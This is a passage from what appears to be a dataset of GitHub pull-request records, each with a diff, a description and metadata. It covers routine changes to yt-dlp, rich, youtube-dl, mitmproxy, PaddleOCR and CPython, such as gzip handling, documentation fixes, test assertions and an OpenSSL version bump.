- [`zlib.decompress`](https://docs.python.org/3/library/zlib.html#zlib.decompress)
- 16 + (8 to 15): Uses the low 4 bits of the value as the window size logarithm. The input must include a gzip header and trailer.
<details open><summary>Template</summary> <!-- OPEN is intentional -->
<!--
# PLEASE FOLLOW THE GUIDE BELOW
- You will be asked some questions, please read them **carefully** and answer honestly
- Put an `x` into all the boxes `[ ]` relevant to your *pull request* (like [x])
- Use *Preview* tab to see how your *pull request* will actually look like
-->
### Before submitting a *pull request* make sure you have:
- [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)
- [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8) and [ran relevant tests](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions)
### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check all of the following options that apply:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Fix or improvement to an extractor (Make sure to add/update tests)
- [ ] New extractor ([Piracy websites will not be accepted](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#is-the-website-primarily-used-for-piracy))
- [x] Core bug fix/improvement
- [ ] New feature (It is strongly [recommended to open an issue first](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#adding-new-feature-or-making-overarching-changes))
<!-- Do NOT edit/remove anything below this! -->
</details><details><summary>Copilot Summary</summary>
<!--
copilot:all
-->
### <samp>🤖 Generated by Copilot at 8fa9675</samp>
### Summary
🚀🔧🗜️
<!--
1. 🚀 This emoji conveys the idea of speeding up or improving performance, which is one of the main goals of the change.
2. 🔧 This emoji suggests fixing or tweaking something, which is another aspect of the change, as it simplifies the code and removes an unnecessary dependency.
3. 🗜️ This emoji depicts a compression tool, which is related to the topic of gzip decompression. It could also imply reducing the size or complexity of something, which is another effect of the change.
-->
Improve gzip decompression performance in `yt_dlp.networking._urllib` module. Replace `gzip` module with `zlib` module and simplify `gz` method.
> _Sing, O Muse, of the swift and skillful coder_
> _Who in his wisdom sought to improve the gz method_
> _And with the aid of zlib, the mighty compression tool_
> _He freed the code from gzip, the slow and needless import_
### Walkthrough
* Simplify the `gz` method to use `zlib` instead of `gzip` for decompressing gzip responses ([link](https://github.com/yt-dlp/yt-dlp/pull/7611/files?diff=unified&w=0#diff-c7b2bfc3ad326c23db07694e9137f86e58e526681dab17e7680a968a7190e232L157-R158))
* Remove unused import of `gzip` module ([link](https://github.com/yt-dlp/yt-dlp/pull/7611/files?diff=unified&w=0#diff-c7b2bfc3ad326c23db07694e9137f86e58e526681dab17e7680a968a7190e232L4))
</details>
| https://api.github.com/repos/yt-dlp/yt-dlp/pulls/7611 | 2023-07-16T12:53:15Z | 2023-08-26T22:13:30Z | 2023-08-26T22:13:30Z | 2023-08-26T22:14:54Z | 351 | yt-dlp/yt-dlp | 7,847 |
Fix doc | diff --git a/docs/source/panel.rst b/docs/source/panel.rst
index b98af37b7..bbb938d72 100644
--- a/docs/source/panel.rst
+++ b/docs/source/panel.rst
@@ -9,7 +9,7 @@ To draw a border around any content, construct a :class:`~rich.panel.Panel` with
You can change the style of the panel by setting the ``box`` argument to the Panel constructor. See :ref:`appendix_box` for a list of available box styles.
-Panels will extend to the full width of the terminal. You can make panel *fit* the content why setting ``fit=True`` on the constructor, or by creating the Panel with :meth:`~rich.panel.Panel.fit`. For example::
+Panels will extend to the full width of the terminal. You can make panel *fit* the content by setting ``expand=False`` on the constructor, or by creating the Panel with :meth:`~rich.panel.Panel.fit`. For example::
from rich import print
from rich.panel import Panel
@@ -21,4 +21,4 @@ The Panel constructor accepts a ``title`` argument which will draw a title withi
from rich.panel import Panel
print(Panel("Hello, [red]World!", title="Welcome"))
-See :class:`~rich.panel.Panel` for details how to customize Panels.
\ No newline at end of file
+See :class:`~rich.panel.Panel` for details how to customize Panels.
| ## Type of changes
- [ ] Bug fix
- [ ] New feature
- [x] Documentation / docstrings
- [ ] Tests
- [ ] Other
## Checklist
- [ ] I've run the latest [black](https://github.com/ambv/black) with default args on new code.
- [ ] I've updated CHANGELOG.md and CONTRIBUTORS.md where appropriate.
- [ ] I've added tests for new code.
- [ ] I accept that @willmcgugan may be pedantic in the code review.
## Description
Fix #197
| https://api.github.com/repos/Textualize/rich/pulls/198 | 2020-08-01T12:01:18Z | 2020-08-01T12:24:21Z | 2020-08-01T12:24:21Z | 2020-08-01T12:24:21Z | 322 | Textualize/rich | 48,331 |
[twitch] Determine ids from URLs when extracting playlist | diff --git a/youtube_dl/extractor/twitch.py b/youtube_dl/extractor/twitch.py
index bf57eac01f2..f9164af098d 100644
--- a/youtube_dl/extractor/twitch.py
+++ b/youtube_dl/extractor/twitch.py
@@ -358,9 +358,16 @@ def _extract_playlist(self, channel_id):
break
offset += limit
return self.playlist_result(
- [self.url_result(entry) for entry in orderedSet(entries)],
+ [self._make_url_result(entry) for entry in orderedSet(entries)],
channel_id, channel_name)
+ def _make_url_result(self, url):
+ try:
+ video_id = 'v%s' % TwitchVodIE._match_id(url)
+ return self.url_result(url, TwitchVodIE.ie_key(), video_id=video_id)
+ except AssertionError:
+ return self.url_result(url)
+
def _extract_playlist_page(self, response):
videos = response.get('videos')
return [video['url'] for video in videos] if videos else []
| ### Before submitting a *pull request* make sure you have:
- [x] At least skimmed through [adding new extractor tutorial](https://github.com/rg3/youtube-dl#adding-support-for-a-new-site) and [youtube-dl coding conventions](https://github.com/rg3/youtube-dl#youtube-dl-coding-conventions) sections
- [x] [Searched](https://github.com/rg3/youtube-dl/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into youtube-dl each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Bug fix
- [x] Improvement
- [ ] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
Using the `--download-archive` parameter, youtube-dl can skip videos that it has already downloaded, as soon as it determines that the extractor and video ID match an existing video. For Twitch, the video ID for a VOD is determined as part of a JSON request in `_real_extract(...)`. However, the video ID can also be reliably determined from the URL; the ID is part of the URL, with a leading `v`. The Twitch extractor already relies on this behaviour for downloading rechat subtitles.
With this pull request, when extracting a playlist, the URL is checked against `_match_id(...)` for the VOD extractor. If it matches, we now return the video ID alongside the URL, so that the video can be skipped if desired without needing to make a JSON request. This makes it significantly faster to check for new videos on a channel, and reduces the number of API calls. If it turns out that a URL in the playlist does not match our expectations, we fall back to the old behaviour of simply returning the URL.
An excerpt from a download *without* this pull request (several seconds between each video):
```
...
[download] Downloading video 80 of 84
[twitch:vod] 204792451: Downloading vod info JSON
[twitch:vod] 204792451: Downloading vod access token
[twitch:vod] 204792451: Downloading m3u8 information
[download] Building the new Editing/Streaming/Gaming PC has already been recorded in archive
[download] Downloading video 81 of 84
[twitch:vod] 204821085: Downloading vod info JSON
[twitch:vod] 204821085: Downloading vod access token
[twitch:vod] 204821085: Downloading m3u8 information
[download] PC build, the final solution has already been recorded in archive
[download] Downloading video 82 of 84
[twitch:vod] 204850361: Downloading vod info JSON
[twitch:vod] 204850361: Downloading vod access token
[twitch:vod] 204850361: Downloading m3u8 information
[download] PC build, COMPLETE! (testing) has already been recorded in archive
[download] Downloading video 83 of 84
[twitch:vod] 207644374: Downloading vod info JSON
[twitch:vod] 207644374: Downloading vod access token
[twitch:vod] 207644374: Downloading m3u8 information
[download] pubg sQUADS has already been recorded in archive
[download] Downloading video 84 of 84
[twitch:vod] 212555204: Downloading vod info JSON
[twitch:vod] 212555204: Downloading vod access token
[twitch:vod] 212555204: Downloading m3u8 information
[download] PUBG XMAS has already been recorded in archive
```
And now, from a similar download *with* this pull request (near-instant):
```
...
[download] Downloading video 60 of 100
[download] v205683181 has already been recorded in archive
[download] Downloading video 61 of 100
[download] v207626842 has already been recorded in archive
[download] Downloading video 62 of 100
[download] v203168347 has already been recorded in archive
[download] Downloading video 63 of 100
[download] v205130464 has already been recorded in archive
[download] Downloading video 64 of 100
```
Finally, to demonstrate sane fallback to the old behaviour, if we simulate an error extracting the video ID by altering the code to pass a bad URL to `_match_id`, we get an excerpt like the following:
```
...
[twitch:videos:past-broadcasts] Unable to match video ID from URL: https://www.twitch.tv/videos/188047675
[twitch:videos:past-broadcasts] Unable to match video ID from URL: https://www.twitch.tv/videos/187769206
[twitch:videos:past-broadcasts] Unable to match video ID from URL: https://www.twitch.tv/videos/187452839
[twitch:videos:past-broadcasts] Unable to match video ID from URL: https://www.twitch.tv/videos/187354420
[twitch:videos:past-broadcasts] Unable to match video ID from URL: https://www.twitch.tv/videos/187171654
[download] Downloading playlist: Coestar
[twitch:videos:past-broadcasts] playlist Coestar: Collected 100 video ids (downloading 100 of them)
[download] Downloading video 1 of 100
[twitch:vod] 213467862: Downloading vod info JSON
[twitch:vod] 213467862: Downloading vod access token
[twitch:vod] 213467862: Downloading m3u8 information
[download] Retro stuff: Jaguar, OSSC/Framemeister, and more (#StreamADay 1486) has already been recorded in archive
[download] Downloading video 2 of 100
[twitch:vod] 207973514: Downloading vod info JSON
[twitch:vod] 207973514: Downloading vod access token
[twitch:vod] 207973514: Downloading m3u8 information
[download] Checking out that NEW MAP (REAL) (#StreamADay 1466) has already been recorded in archive
...
``` | https://api.github.com/repos/ytdl-org/youtube-dl/pulls/15139 | 2018-01-02T00:21:22Z | 2018-01-03T09:22:55Z | 2018-01-03T09:22:55Z | 2018-01-03T09:22:55Z | 244 | ytdl-org/youtube-dl | 49,865 |
Fix failing unit tests caused by a69d223b | diff --git a/test/netlib/http/test_request.py b/test/netlib/http/test_request.py
index 7a6a9665c2..b4ecfd4ee9 100644
--- a/test/netlib/http/test_request.py
+++ b/test/netlib/http/test_request.py
@@ -138,8 +138,8 @@ def test_get_query(self):
def test_set_query(self):
request = treq(host=b"foo", headers = Headers(host=b"bar"))
request.query = ODict([])
- assert request.host == b"foo"
- assert request.headers["host"] == b"bar"
+ assert request.host == "foo"
+ assert request.headers["host"] == "bar"
def test_get_cookies_none(self):
request = treq()
@@ -188,8 +188,8 @@ def test_set_path_components(self):
request.path_components = []
assert request.path == "/"
request.query = ODict([])
- assert request.host == b"foo"
- assert request.headers["host"] == b"bar"
+ assert request.host == "foo"
+ assert request.headers["host"] == "bar"
def test_anticache(self):
request = treq()
| https://api.github.com/repos/mitmproxy/mitmproxy/pulls/949 | 2016-02-16T04:39:33Z | 2016-02-16T04:55:23Z | 2016-02-16T04:55:23Z | 2016-02-16T04:55:23Z | 265 | mitmproxy/mitmproxy | 27,982 |
|
word wrap code blocks | diff --git a/CHANGELOG.md b/CHANGELOG.md
index 97b652247..fd5e4e843 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -20,6 +20,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
- Fixed exception in IPython when disabling pprint with %pprint https://github.com/willmcgugan/rich/issues/1646
- Fixed issue where values longer than the console width produced invalid JSON https://github.com/willmcgugan/rich/issues/1653
+## Changed
+
+- Markdown codeblocks now word-wrap https://github.com/willmcgugan/rich/issues/1515
+
## [10.12.0] - 2021-10-06
### Updated
diff --git a/rich/markdown.py b/rich/markdown.py
index 35ac28c1c..92d0d3c01 100644
--- a/rich/markdown.py
+++ b/rich/markdown.py
@@ -177,7 +177,7 @@ def __rich_console__(
) -> RenderResult:
code = str(self.text).rstrip()
syntax = Panel(
- Syntax(code, self.lexer_name, theme=self.theme),
+ Syntax(code, self.lexer_name, theme=self.theme, word_wrap=True),
border_style="dim",
box=box.SQUARE,
)
diff --git a/tests/test_log.py b/tests/test_log.py
index e0b4682e5..94a1f9e17 100644
--- a/tests/test_log.py
+++ b/tests/test_log.py
@@ -6,7 +6,8 @@
from rich.console import Console
-re_link_ids = re.compile(r"id=((\d+);(file:///(\w+\/)+(\w+\.py)(#\d+)?))\x1b")
+
+re_link_ids = re.compile(r"id=[\d\.\-]*?;.*?\x1b")
def replace_link_ids(render: str) -> str:
@@ -14,7 +15,7 @@ def replace_link_ids(render: str) -> str:
reproducible tests.
"""
- return re_link_ids.sub("id=0;file:///path/to/source.py#00\x1b", render)
+ return re_link_ids.sub("id=0;foo\x1b", render)
test_data = [1, 2, 3]
@@ -37,7 +38,7 @@ def render_log():
def test_log():
expected = replace_link_ids(
- "\x1b[2;36m[TIME]\x1b[0m\x1b[2;36m \x1b[0m \x1b]8;id=0;file:///path/to/foo.py#00\x1b\\\x1b[2msource.py\x1b[0m\x1b]8;;\x1b\\\x1b[2m:\x1b[0m\x1b]8;id=0;file:///path/to/foo.py#00\x1b\\\x1b[2m32\x1b[0m\x1b]8;;\x1b\\\n\x1b[2;36m \x1b[0m\x1b[2;36m \x1b[0mHello from \x1b[1m<\x1b[0m\x1b[1;95mconsole\x1b[0m\x1b[39m \x1b[0m\x1b[33mwidth\x1b[0m\x1b[39m=\x1b[0m\x1b[1;36m80\x1b[0m\x1b[39m ColorSystem.TRUECOLOR\x1b[0m\x1b[1m>\x1b[0m ! \x1b]8;id=0;file:///path/to/foo.py#00\x1b\\\x1b[2msource.py\x1b[0m\x1b]8;;\x1b\\\x1b[2m:\x1b[0m\x1b]8;id=0;file:///path/to/foo.py#00\x1b\\\x1b[2m33\x1b[0m\x1b]8;;\x1b\\\n\x1b[2;36m \x1b[0m\x1b[2;36m \x1b[0m\x1b[1m[\x1b[0m\x1b[1;36m1\x1b[0m, \x1b[1;36m2\x1b[0m, \x1b[1;36m3\x1b[0m\x1b[1m]\x1b[0m \x1b]8;id=0;file:///path/to/foo.py#00\x1b\\\x1b[2msource.py\x1b[0m\x1b]8;;\x1b\\\x1b[2m:\x1b[0m\x1b]8;id=0;file:///path/to/foo.py#00\x1b\\\x1b[2m34\x1b[0m\x1b]8;;\x1b\\\n \x1b[34m╭─\x1b[0m\x1b[34m───────────────────── \x1b[0m\x1b[3;34mlocals\x1b[0m\x1b[34m ─────────────────────\x1b[0m\x1b[34m─╮\x1b[0m \n \x1b[34m│\x1b[0m \x1b[3;33mconsole\x1b[0m\x1b[31m =\x1b[0m \x1b[1m<\x1b[0m\x1b[1;95mconsole\x1b[0m\x1b[39m \x1b[0m\x1b[33mwidth\x1b[0m\x1b[39m=\x1b[0m\x1b[1;36m80\x1b[0m\x1b[39m ColorSystem.TRUECOLOR\x1b[0m\x1b[1m>\x1b[0m \x1b[34m│\x1b[0m \n \x1b[34m╰────────────────────────────────────────────────────╯\x1b[0m \n"
+ "\x1b[2;36m[TIME]\x1b[0m\x1b[2;36m \x1b[0m \x1b]8;id=0;foo\x1b\\\x1b[2msource.py\x1b[0m\x1b]8;;\x1b\\\x1b[2m:\x1b[0m\x1b]8;id=0;foo\x1b\\\x1b[2m33\x1b[0m\x1b]8;;\x1b\\\n\x1b[2;36m \x1b[0m\x1b[2;36m \x1b[0mHello from \x1b[1m<\x1b[0m\x1b[1;95mconsole\x1b[0m\x1b[39m \x1b[0m\x1b[33mwidth\x1b[0m\x1b[39m=\x1b[0m\x1b[1;36m80\x1b[0m\x1b[39m ColorSystem.TRUECOLOR\x1b[0m\x1b[1m>\x1b[0m ! \x1b]8;id=0;foo\x1b\\\x1b[2msource.py\x1b[0m\x1b]8;;\x1b\\\x1b[2m:\x1b[0m\x1b]8;id=0;foo\x1b\\\x1b[2m34\x1b[0m\x1b]8;;\x1b\\\n\x1b[2;36m \x1b[0m\x1b[2;36m \x1b[0m\x1b[1m[\x1b[0m\x1b[1;36m1\x1b[0m, \x1b[1;36m2\x1b[0m, \x1b[1;36m3\x1b[0m\x1b[1m]\x1b[0m \x1b]8;id=0;foo\x1b\\\x1b[2msource.py\x1b[0m\x1b]8;;\x1b\\\x1b[2m:\x1b[0m\x1b]8;id=0;foo\x1b\\\x1b[2m35\x1b[0m\x1b]8;;\x1b\\\n \x1b[34m╭─\x1b[0m\x1b[34m───────────────────── \x1b[0m\x1b[3;34mlocals\x1b[0m\x1b[34m ─────────────────────\x1b[0m\x1b[34m─╮\x1b[0m \n \x1b[34m│\x1b[0m \x1b[3;33mconsole\x1b[0m\x1b[31m =\x1b[0m \x1b[1m<\x1b[0m\x1b[1;95mconsole\x1b[0m\x1b[39m \x1b[0m\x1b[33mwidth\x1b[0m\x1b[39m=\x1b[0m\x1b[1;36m80\x1b[0m\x1b[39m ColorSystem.TRUECOLOR\x1b[0m\x1b[1m>\x1b[0m \x1b[34m│\x1b[0m \n \x1b[34m╰────────────────────────────────────────────────────╯\x1b[0m \n"
)
rendered = render_log()
print(repr(rendered))
| Fixes https://github.com/willmcgugan/rich/issues/1515 | https://api.github.com/repos/Textualize/rich/pulls/1655 | 2021-11-07T15:13:56Z | 2021-11-07T15:49:02Z | 2021-11-07T15:49:02Z | 2021-11-07T15:49:06Z | 2,365 | Textualize/rich | 48,193 |
[bugfix]fix bug about paddle.sum in rec_aster_loss.py | diff --git a/ppocr/losses/rec_aster_loss.py b/ppocr/losses/rec_aster_loss.py
index 52605e46db..9927fbc043 100644
--- a/ppocr/losses/rec_aster_loss.py
+++ b/ppocr/losses/rec_aster_loss.py
@@ -27,10 +27,9 @@ def __init__(self, margin=0.):
self.epsilon = 1e-12
def forward(self, x1, x2, target):
- similarity = paddle.sum(
- x1 * x2, dim=-1) / (paddle.norm(
- x1, axis=-1) * paddle.norm(
- x2, axis=-1) + self.epsilon)
+ similarity = paddle.sum(x1 * x2, axis=-1) / (paddle.norm(
+ x1, axis=-1) * paddle.norm(
+ x2, axis=-1) + self.epsilon)
one_list = paddle.full_like(target, fill_value=1)
out = paddle.mean(
paddle.where(
| https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/7537 | 2022-09-08T12:11:57Z | 2022-09-08T12:12:33Z | 2022-09-08T12:12:33Z | 2022-09-08T12:12:34Z | 237 | PaddlePaddle/PaddleOCR | 42,455 |
|
refine prune doc | diff --git a/deploy/slim/prune/README.md b/deploy/slim/prune/README.md
index 8ec5492cc9..ab731215a0 100644
--- a/deploy/slim/prune/README.md
+++ b/deploy/slim/prune/README.md
@@ -3,7 +3,8 @@
复杂的模型有利于提高模型的性能,但也导致模型中存在一定冗余,模型裁剪通过移出网络模型中的子模型来减少这种冗余,达到减少模型计算复杂度,提高模型推理性能的目的。
-本教程将介绍如何使用PaddleSlim量化PaddleOCR的模型。
+本教程将介绍如何使用飞桨模型压缩库PaddleSlim做PaddleOCR模型的压缩。
+PaddleSlim(项目链接:https://github.com/PaddlePaddle/PaddleSlim)集成了模型剪枝、量化(包括量化训练和离线量化)、蒸馏和神经网络搜索等多种业界常用且领先的模型压缩功能,如果您感兴趣,可以关注并了解。
在开始本教程之前,建议先了解
1. [PaddleOCR模型的训练方法](../../../doc/doc_ch/quickstart.md)
@@ -33,8 +34,20 @@ python setup.py install
### 3. 敏感度分析训练
-加载预训练模型后,通过对现有模型的每个网络层进行敏感度分析,了解各网络层冗余度,从而决定每个网络层的裁剪比例。
+加载预训练模型后,通过对现有模型的每个网络层进行敏感度分析,得到敏感度文件:sensitivities_0.data,可以通过PaddleSlim提供的[接口](https://github.com/PaddlePaddle/PaddleSlim/blob/develop/paddleslim/prune/sensitive.py#L221)加载文件,获得各网络层在不同裁剪比例下的精度损失。从而了解各网络层冗余度,决定每个网络层的裁剪比例。
敏感度分析的具体细节见:[敏感度分析](https://github.com/PaddlePaddle/PaddleSlim/blob/develop/docs/zh_cn/tutorials/image_classification_sensitivity_analysis_tutorial.md)
+敏感度文件内容格式:
+ sensitivities_0.data(Dict){
+ 'layer_weight_name_0': sens_of_each_ratio(Dict){'pruning_ratio_0': acc_loss, 'pruning_ratio_1': acc_loss}
+ 'layer_weight_name_1': sens_of_each_ratio(Dict){'pruning_ratio_0': acc_loss, 'pruning_ratio_1': acc_loss}
+ }
+
+ 例子:
+ {
+ 'conv10_expand_weights': {0.1: 0.006509952684312718, 0.2: 0.01827734339798862, 0.3: 0.014528405644659832, 0.6: 0.06536008804270439, 0.8: 0.11798612250664964, 0.7: 0.12391408417493704, 0.4: 0.030615754498018757, 0.5: 0.047105205602406594}
+ 'conv10_linear_weights': {0.1: 0.05113190831455035, 0.2: 0.07705573833558801, 0.3: 0.12096721757739311, 0.6: 0.5135061352930738, 0.8: 0.7908166677143281, 0.7: 0.7272187676899062, 0.4: 0.1819252083008504, 0.5: 0.3728054727792405}
+ }
+加载敏感度文件后会返回一个字典,字典中的keys为网络模型参数模型的名字,values为一个字典,里面保存了相应网络层的裁剪敏感度信息。例如在例子中,conv10_expand_weights所对应的网络层在裁掉10%的卷积核后模型性能相较原模型会下降0.65%,详细信息可见[PaddleSlim](https://github.com/PaddlePaddle/PaddleSlim/blob/develop/docs/zh_cn/algo/algo.md#2-%E5%8D%B7%E7%A7%AF%E6%A0%B8%E5%89%AA%E8%A3%81%E5%8E%9F%E7%90%86)
进入PaddleOCR根目录,通过以下命令对模型进行敏感度分析训练:
```bash
@@ -42,7 +55,7 @@ python deploy/slim/prune/sensitivity_anal.py -c configs/det/det_mv3_db.yml -o Gl
```
### 4. 模型裁剪训练
-裁剪时通过之前的敏感度分析文件决定每个网络层的裁剪比例。在具体实现时,为了尽可能多的保留从图像中提取的低阶特征,我们跳过了backbone中靠近输入的4个卷积层。同样,为了减少由于裁剪导致的模型性能损失,我们通过之前敏感度分析所获得的敏感度表,挑选出了一些冗余较少,对裁剪较为敏感的[网络层](https://github.com/PaddlePaddle/PaddleOCR/blob/develop/deploy/slim/prune/pruning_and_finetune.py#L41),并在之后的裁剪过程中选择避开这些网络层。裁剪过后finetune的过程沿用OCR检测模型原始的训练策略。
+裁剪时通过之前的敏感度分析文件决定每个网络层的裁剪比例。在具体实现时,为了尽可能多的保留从图像中提取的低阶特征,我们跳过了backbone中靠近输入的4个卷积层。同样,为了减少由于裁剪导致的模型性能损失,我们通过之前敏感度分析所获得的敏感度表,人工挑选出了一些冗余较少,对裁剪较为敏感的[网络层](https://github.com/PaddlePaddle/PaddleOCR/blob/develop/deploy/slim/prune/pruning_and_finetune.py#L41)(指在较低的裁剪比例下就导致很高性能损失的网络层),并在之后的裁剪过程中选择避开这些网络层。裁剪过后finetune的过程沿用OCR检测模型原始的训练策略。
```bash
python deploy/slim/prune/pruning_and_finetune.py -c configs/det/det_mv3_db.yml -o Global.pretrain_weights=./deploy/slim/prune/pretrain_models/det_mv3_db/best_accuracy Global.test_batch_size_per_card=1
diff --git a/deploy/slim/prune/README_en.md b/deploy/slim/prune/README_en.md
index d854c10707..fee0b12f12 100644
--- a/deploy/slim/prune/README_en.md
+++ b/deploy/slim/prune/README_en.md
@@ -115,6 +115,7 @@ Compress results:
Generally, a more complex model would achive better performance in the task, but it also leads to some redundancy in the model. Model Pruning is a technique that reduces this redundancy by removing the sub-models in the neural network model, so as to reduce model calculation complexity and improve model inference performance.
This example uses PaddleSlim provided[APIs of Pruning](https://paddlepaddle.github.io/PaddleSlim/api/prune_api/) to compress the OCR model.
+PaddleSlim (GitHub: https://github.com/PaddlePaddle/PaddleSlim), an open source library which integrates model pruning, quantization (including quantization training and offline quantization), distillation, neural network architecture search, and many other commonly used and leading model compression technique in the industry.
It is recommended that you could understand following pages before reading this example,:
@@ -146,7 +147,20 @@ python setup.py install
## Pruning sensitivity analysis
- After the pre-training model is loaded, sensitivity analysis is performed on each network layer of the model to understand the redundancy of each network layer, thereby determining the pruning ratio of each network layer. For specific details of sensitivity analysis, see:[Sensitivity analysis](https://github.com/PaddlePaddle/PaddleSlim/blob/develop/docs/zh_cn/tutorials/image_classification_sensitivity_analysis_tutorial.md)
+ After the pre-training model is loaded, sensitivity analysis is performed on each network layer of the model to understand the redundancy of each network layer, and save a sensitivity file which named: sensitivities_0.data. After that, user could load the sensitivity file via the [methods provided by PaddleSlim](https://github.com/PaddlePaddle/PaddleSlim/blob/develop/paddleslim/prune/sensitive.py#L221) and determining the pruning ratio of each network layer automatically. For specific details of sensitivity analysis, see:[Sensitivity analysis](https://github.com/PaddlePaddle/PaddleSlim/blob/develop/docs/zh_cn/tutorials/image_classification_sensitivity_analysis_tutorial.md)
+ The data format of sensitivity file:
+ sensitivities_0.data(Dict){
+ 'layer_weight_name_0': sens_of_each_ratio(Dict){'pruning_ratio_0': acc_loss, 'pruning_ratio_1': acc_loss}
+ 'layer_weight_name_1': sens_of_each_ratio(Dict){'pruning_ratio_0': acc_loss, 'pruning_ratio_1': acc_loss}
+ }
+
+ example:
+ {
+ 'conv10_expand_weights': {0.1: 0.006509952684312718, 0.2: 0.01827734339798862, 0.3: 0.014528405644659832, 0.6: 0.06536008804270439, 0.8: 0.11798612250664964, 0.7: 0.12391408417493704, 0.4: 0.030615754498018757, 0.5: 0.047105205602406594}
+ 'conv10_linear_weights': {0.1: 0.05113190831455035, 0.2: 0.07705573833558801, 0.3: 0.12096721757739311, 0.6: 0.5135061352930738, 0.8: 0.7908166677143281, 0.7: 0.7272187676899062, 0.4: 0.1819252083008504, 0.5: 0.3728054727792405}
+ }
+ The function would return a dict after loading the sensitivity file. The keys of the dict are name of parameters in each layer. And the value of key is the information about pruning sensitivity of correspoding layer. In example, pruning 10% filter of the layer corresponding to conv10_expand_weights would lead to 0.65% degradation of model performance. The details could be seen at: [Sensitivity analysis](https://github.com/PaddlePaddle/PaddleSlim/blob/develop/docs/zh_cn/algo/algo.md#2-%E5%8D%B7%E7%A7%AF%E6%A0%B8%E5%89%AA%E8%A3%81%E5%8E%9F%E7%90%86)
+
Enter the PaddleOCR root directory,perform sensitivity analysis on the model with the following command:
diff --git a/deploy/slim/quantization/README.md b/deploy/slim/quantization/README.md
index bf801d7133..b35761c649 100755
--- a/deploy/slim/quantization/README.md
+++ b/deploy/slim/quantization/README.md
@@ -3,7 +3,8 @@
复杂的模型有利于提高模型的性能,但也导致模型中存在一定冗余,模型量化将全精度缩减到定点数减少这种冗余,达到减少模型计算复杂度,提高模型推理性能的目的。
模型量化可以在基本不损失模型的精度的情况下,将FP32精度的模型参数转换为Int8精度,减小模型参数大小并加速计算,使用量化后的模型在移动端等部署时更具备速度优势。
-本教程将介绍如何使用PaddleSlim量化PaddleOCR的模型。
+本教程将介绍如何使用飞桨模型压缩库PaddleSlim做PaddleOCR模型的压缩。
+PaddleSlim(项目链接:https://github.com/PaddlePaddle/PaddleSlim)集成了模型剪枝、量化(包括量化训练和离线量化)、蒸馏和神经网络搜索等多种业界常用且领先的模型压缩功能,如果您感兴趣,可以关注并了解。
在开始本教程之前,建议先了解[PaddleOCR模型的训练方法](../../../doc/doc_ch/quickstart.md)以及[PaddleSlim](https://paddleslim.readthedocs.io/zh_CN/latest/index.html)
diff --git a/deploy/slim/quantization/README_en.md b/deploy/slim/quantization/README_en.md
index 4b8a2b23a2..69bd603a25 100755
--- a/deploy/slim/quantization/README_en.md
+++ b/deploy/slim/quantization/README_en.md
@@ -116,6 +116,7 @@ Compress results:
Generally, a more complex model would achive better performance in the task, but it also leads to some redundancy in the model. Quantization is a technique that reduces this redundancyby reducing the full precision data to a fixed number, so as to reduce model calculation complexity and improve model inference performance.
This example uses PaddleSlim provided [APIs of Quantization](https://paddlepaddle.github.io/PaddleSlim/api/quantization_api/) to compress the OCR model.
+PaddleSlim (GitHub: https://github.com/PaddlePaddle/PaddleSlim), an open source library which integrates model pruning, quantization (including quantization training and offline quantization), distillation, neural network architecture search, and many other commonly used and leading model compression technique in the industry.
It is recommended that you could understand following pages before reading this example,:
| https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/783 | 2020-09-21T08:02:54Z | 2020-09-21T12:54:59Z | 2020-09-21T12:54:59Z | 2020-09-21T12:54:59Z | 3,282 | PaddlePaddle/PaddleOCR | 42,615 |
|
[2.7] bpo-34631: Updated OpenSSL to 1.0.2s in Windows installer (GH-14161) | diff --git a/Misc/NEWS.d/next/Security/2019-06-17-08-43-19.bpo-34631.pJ8CGR.rst b/Misc/NEWS.d/next/Security/2019-06-17-08-43-19.bpo-34631.pJ8CGR.rst
new file mode 100644
index 00000000000000..41a972e9665aaf
--- /dev/null
+++ b/Misc/NEWS.d/next/Security/2019-06-17-08-43-19.bpo-34631.pJ8CGR.rst
@@ -0,0 +1 @@
+Updated OpenSSL to 1.0.2s in Windows installer
diff --git a/PCbuild/get_externals.bat b/PCbuild/get_externals.bat
index ed6a79f11db67f..f0a4b9946d86c7 100644
--- a/PCbuild/get_externals.bat
+++ b/PCbuild/get_externals.bat
@@ -47,7 +47,7 @@ rem files in both this dir and PC\VS9.0
set libraries=
set libraries=%libraries% bzip2-1.0.6
if NOT "%IncludeBsddb%"=="false" set libraries=%libraries% bsddb-4.7.25.0
-if NOT "%IncludeSSL%"=="false" set libraries=%libraries% openssl-1.0.2q
+if NOT "%IncludeSSL%"=="false" set libraries=%libraries% openssl-1.0.2s
set libraries=%libraries% sqlite-3.14.2.0
if NOT "%IncludeTkinter%"=="false" set libraries=%libraries% tcl-8.5.19.0
if NOT "%IncludeTkinter%"=="false" set libraries=%libraries% tk-8.5.19.0
diff --git a/PCbuild/python.props b/PCbuild/python.props
index 6673ff31368e49..b3dc1da3dffd5f 100644
--- a/PCbuild/python.props
+++ b/PCbuild/python.props
